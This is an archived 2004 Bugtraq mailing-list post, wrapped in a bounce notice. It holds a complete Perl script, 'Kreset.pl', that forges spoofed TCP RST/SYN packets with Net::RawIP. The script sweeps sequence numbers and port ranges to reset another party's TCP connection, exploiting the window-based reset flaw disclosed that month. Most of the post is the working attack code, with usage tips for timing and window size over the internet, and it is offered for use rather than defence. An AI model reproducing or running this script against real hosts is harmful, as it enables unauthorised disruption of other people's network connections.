[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040425173451.6E5BB396A@sitemail.everyone.net>
Date: Sun, 25 Apr 2004 10:34:51 -0700 (PDT)
From: K sPecial <KsPecial@...zemail.com>
To: bugtraq@...urityfocus.com
Subject: Perl code exploting TCP not checking RST ACK.
_____________________________________________________________
Fight the power! BlazeMail.com
Received: from omta12.mta.everyone.net (sitemail3 [216.200.145.37])
by imta01.mta.everyone.net (Postfix) with ESMTP id C5E7750804
for <KsPecial@...zemail.com>; Sun, 25 Apr 2004 00:40:01 -0700 (PDT)
Received: by omta12.mta.everyone.net (Postfix)
id 71CA343F6C; Sun, 25 Apr 2004 00:39:55 -0700 (PDT)
Date: Sun, 25 Apr 2004 00:39:55 -0700 (PDT)
From: MAILER-DAEMON@....everyone.net (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: KsPecial@...zemail.com
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="0FE174774C.1082878795/omta12.mta.everyone.net"
Message-Id: <20040425073955.71CA343F6C@...a12.mta.everyone.net>
This is a MIME-encapsulated message.
--0FE174774C.1082878795/omta12.mta.everyone.net
Content-Description: Notification
Content-Type: text/plain
This is the Postfix email server.
I'm sorry to have to inform you that the message returned
below could not be delivered to one or more destinations.
For further assistance, please contact the postmaster at the recipient domain.
If you do so, please include this problem report. You can
delete your own text from the message returned below.
The Postfix program
<bugtraq@...urityfocus.net>: connect to securityfocus.net[205.206.231.10]:
Connection timed out
--0FE174774C.1082878795/omta12.mta.everyone.net
Content-Description: Delivery error report
Content-Type: message/delivery-status
Reporting-MTA: dns; omta12.mta.everyone.net
Arrival-Date: Thu, 22 Apr 2004 23:45:17 -0700 (PDT)
Final-Recipient: rfc822; bugtraq@...urityfocus.net
Action: failed
Status: 4.0.0
Diagnostic-Code: X-Postfix; connect to securityfocus.net[205.206.231.10]:
Connection timed out
--0FE174774C.1082878795/omta12.mta.everyone.net
Content-Description: Undelivered Message
Content-Type: message/rfc822
Received: from sitemail.everyone.net (bigip1-snat [216.200.145.29])
by omta12.mta.everyone.net (Postfix) with ESMTP
id 0FE174774C; Thu, 22 Apr 2004 23:45:16 -0700 (PDT)
Received: by sitemail.everyone.net (Postfix, from userid 99)
id 57F40394E; Thu, 22 Apr 2004 23:45:14 -0700 (PDT)
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Date: Thu, 22 Apr 2004 23:45:14 -0700 (PDT)
From: K sPecial <KsPecial@...zemail.com>
To: Redaction@...tik.com;, Technique@...tik.com;, Presse@...tik.com;,
Contrib@...tik.com;, Contact@...tik.com;, bugtraq@...urityfocus.net;,
expert@...uriteam.com;, info@...uriteam.com;, kspecial@...zemail.com;
Subject: Perl code exploit TCP Window vuln.
Reply-To: KsPecial@...zemail.com
X-Originating-Ip: [207.69.0.8]
X-Eon-Sig: AQG+2S1AiLt6AAT6BQEAAAAB,4c585d8777ce2ed7303ecc3fb5a18a66
Message-Id: <20040423064514.57F40394E@...email.everyone.net>
Well, I thought I was the first to release some of this but i see places like k-otik already have some C code. Here is some perl code that will reset a connection, it takes a port range that can be used as the source IP's port range, or the destination ip's port range (it assumes you at least no the port of one side of the connection).
Contrib congrats at la la kaiten....
Peace goes out to my dawgs, saevio (ya i still love you, you little hoe), attila, uzimonkey, zeedo, eightball, I won't even mention idiocy and AlienDaemon... anyway.. here it is :)
-----
use Net::RawIP;
## Kreator -> K-sPecial [http://xzziroz.freeshell.org]
## Date -> 4-23-2004
## Name -> Kreset.pl
## Version -> 1.0
##
## Use -> Used to reset a TCP connecting.
## (Using the slipping throught he window meathod described on 4-20-04)
## DESCRIBED HERE: http://www.uniras.gov.uk/vuls/2004/236929/index.htm
##
## Usage -> If you don't fuckin know how to use it, don't use it.
##
## Other -> I played around on nix for a few hours to get the idea down
## pat. I set up an IRCD and connected to it, looked at tcpdump to
## get irssi's local port. irssi's window size was larger so I figured
## i would pretend to be sending RST from server, irssi window
## was around
## 30K while ircd window around 3K, big difference :D. So I enter values
## and since the connection is loop back, i used 0.0 seconds between
## packets.
## it only took a few minutes to disconnect with a 0.0 overlay and
## a 30K window starting at sequence number 0. Only problem over
## the internet, is finding the port of each side, sure you know the
## servers port but not the clients. I got to sequence number 1512500
## using a .10 second delay and a window size of 2500. Sequence
## numbers are
## 32 bit numbers, 32 1's comes out to be 4294967295.
## Do the math, and you know precisely how long it takes to cover
## every sequence RANGE of a given port using a given window size.
## Window sizes should be based on application layer program.
##
## NOTE -> This script assumes you know at least one of the ports,
## if the case is otherwise
## then the script can easily be modified to work around this. Also,
## this was written for
## UNIX variants.
print <<EOF;
-> Kreset.pl by K-sPecial [4-23-2004]
-> Used to reset a connection based on the slipping
-> through the window meathod, exploited publicly on 4-20-2004.
-> [http://xzziroz.freeshell.org]
-> Greets: K-sPecial (myself), saevio, attila, zeedo, uzimonkey
-> eightball, unmanarc, Buuyo^, and whomever else I forgot.
EOF
print "\r\nDo you want a port range for the source IP, or the dest IP?";
print "\r\nIf you want it for the source, type 1, otherwise 2.";
print "\r\nIf you don't want it for either, type one or the other: ";
chomp (my $choice = <STDIN>);
unless ($choice == 1 || $choice == 2) {
print "\r\nEnter 1, or 2.\r\n";
exit(1);
}
print "\r\nEnter source IP: ";
chomp (my $sip = <STDIN>);
if ($choice == 2) {
print "\r\nEnter source port: ";
chomp ($sport = <STDIN>);
if (!($sport)) {
print "\r\nYou must fill in a source port.\r\n";
}
}
print "\r\nEnter dest IP: ";
chomp (my $dip = <STDIN>);
if ($choice == 1) {
print "\r\nEnter dest port: ";
chomp ($dport = <STDIN>);
if (!($dport)) {
print "\r\nYou must fill in a destination port.\r\n";
exit(1);
}
}
print "\r\nEnter begin port: ";
chomp (my $bport = <STDIN>);
print "\r\nEnter end port: ";
chomp (my $eport = <STDIN>);
if (!($sip) || !($dip) || !($bport) || !($eport)) {
print "\r\nYou forgot to fill in one or more fields.\r\n";
exit(1); ## Yea hahah we don't exit (0) anymore. LOL
}
print "\r\nDestinations guessed window size,";
print "\r\nIf you don't define this, we will try small (2500): ";
chomp (my $winsize = <STDIN>); ## Why did the window cross the road?
if (!($winsize)) {
$winsize = 2500;
}
print "\r\nStarting sequence number,";
print "\r\nIf you don't define this, we will start at 0: ";
chomp (my $seqnum = <STDIN>); ## So he could prevent sequence numbers
if (!($seqnum)) { ## from getting through!
$seqnum = 0;
}
print "\r\nNumber of seconds to wait between each packet sent,";
print "\r\nENTER DOTTED DECIMALS HERE PRECEEDED BY A 0 TO";
print "\r\nINDICATE NO MINUTES: 0.10 == 10 ms, 0.0 = 0 ms";
print "\r\nIf you don't define this, we will use 0.10: ";
chomp (my $ms = <STDIN>);
if (!($ms)) {
$ms = "0.10";
}
print <<EOF;
Source IP is -> $sip
Source port is -> $sport
Destination IP is -> $dip
Guessed window size is -> $winsize
Starting sequence number is -> $seqnum
Loop wait is -> $ms
Begin port is -> $bport
End port is -> $eport
EOF
print "Destination port is -> $dport\r\n" if $dport;
print "Source port is -> $sport\r\n" if $sport;
print "\r\n";
my $i = $seqnum;
## LOOKS WHATS FOLLOWS! WES ARES SO LEETS WITHS OURS SELECTS TRICKSES!
## P.S K-sPecial's hopes yours usings a nix variants or this selects
## tricks just mights nots works.
for ($i; 1; $i += $winsize) {
if ($i > 4294967295) {
$bport++;
if ($bport > $eport) {
print "Finished\r\n";
exit(0);
}
else {
print "Looping next port.\r\n";
$i = $seqnum;
sleep(2);
next;
}
}
if ($choice == 2) {
$dport = $bport;
}
else {
$sport = $bport;
}
select(undef, undef, undef, $ms);
print "Sequence Number is -> $i port is -> $bport\r\n";
$a = new Net::RawIP;
$a->set({ip => {saddr => "$sip",daddr => "$dip"},
tcp => {source => $sport,dest => $dport,rst => 1,
syn => 1, seq => $i}}) ;
$a->send;
}
_____________________________________________________________
Fight the power! BlazeMail.com
--0FE174774C.1082878795/omta12.mta.everyone.net--
Powered by blists - more mailing lists